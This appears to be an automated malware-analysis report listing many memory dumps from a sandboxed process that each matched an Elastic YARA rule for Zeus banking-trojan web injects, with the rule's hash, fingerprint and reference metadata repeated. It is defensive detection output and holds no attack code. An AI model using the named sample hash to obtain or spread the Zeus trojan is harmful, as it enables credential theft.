Source: 00000002.00000003.2000637798.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1991348286.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1823534171.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000000.00000003.1437685155.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1882456143.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000000.00000002.1442178242.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001C.00000002.1916004272.0000000002A60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1962925986.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000023.00000002.2052985778.0000000000F10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000020.00000002.2064304121.0000000002840000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000006.00000002.1936970508.0000000001320000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1995104325.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1963615191.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000020.00000002.2056434663.00000000026B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1899640794.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000014.00000002.1898050136.00000000013A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2011646276.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1455512249.0000000000881000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000006.00000002.1937351360.0000000001380000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1992107371.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1980820181.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1964296820.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000016.00000002.1894178366.0000000002A50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.2692265840.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000A.00000002.1940866370.0000000003070000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2000260170.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1963816092.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000019.00000002.1906960513.0000000000E70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.2676559004.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1953762470.000000000ED00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1984425254.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000000A.00000002.1943305461.0000000003210000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1930720915.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 0000001E.00000002.2074493087.0000000002D80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1962281793.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.2691342691.00000000029F3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1960879139.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000005.00000002.1937317769.0000000001410000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.2017537084.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000002.2691342691.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
Source: 00000002.00000003.1984646788.000000000F280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
